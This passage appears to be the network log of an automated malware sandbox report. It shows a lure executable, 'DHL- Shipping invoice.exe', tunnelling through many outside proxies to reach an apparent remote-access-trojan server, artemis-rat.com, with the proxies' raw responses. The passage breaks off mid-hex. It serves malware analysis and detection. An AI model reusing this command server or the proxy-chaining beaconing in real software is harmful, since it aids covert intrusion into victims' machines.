                            937192.168.2.453012162.159.242.252806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.822650909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.909775972 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            938192.168.2.452255115.96.208.12480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.824208975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.165045977 CET72INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            939192.168.2.45290995.111.237.46457386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.824431896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            940192.168.2.4530135.161.103.113806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.825109005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            941192.168.2.4529125.252.23.24931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.825321913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.359221935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062602997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250303030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453449011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750188112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953337908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.676278114 CET39INHTTP/1.0 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            942192.168.2.45288695.43.244.1541536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.826764107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            943192.168.2.451821185.225.232.191806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.827033997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953077078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062721014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.660362959 CET805INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:09 GMT
                            Server: Apache/2.4.57 (Debian)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            944192.168.2.45293482.66.245.82806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.828233004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.669603109 CET818INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache/2.4.56 (Raspbian)
                            Content-Length: 624
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 62 61 69 6c 6c 6f 65 75 69 6c 2e 64 79 6c 61 6e 40 6f 75 74 6c 6f 6f 6b 2e 66 72 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at bailloeuil.dylan@outlook.fr to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Raspbian) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            945192.168.2.45301838.162.16.9531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.828377962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.136698008 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            946192.168.2.45291979.119.155.6380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.828388929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            947192.168.2.45282347.243.114.19281806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.828525066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            948192.168.2.452968130.41.109.15880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.828669071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.151810884 CET56INHTTP/1.1 200 OK
                            date: Tue, 12 Mar 2024 07:37:02 GMT


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            949192.168.2.45285758.234.116.19781936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.829185009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            950192.168.2.4528605.190.220.23531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.831641912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            951192.168.2.45292345.7.177.10522466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.831701994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            952192.168.2.45297154.67.125.4531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.832942009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.995011091 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            953192.168.2.45285161.92.189.15806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.835410118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            954192.168.2.453041104.16.106.234806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.842386961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.931040049 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            955192.168.2.452973161.97.147.193107666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.845953941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343734980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.918329954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.047208071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453335047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750082970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140800953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.602679968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.640542030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            956192.168.2.452843103.166.39.936296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.846488953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            957192.168.2.452173125.228.94.19941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.848283052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            958192.168.2.45282739.108.229.1480026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.851444006 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:03.191612959 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 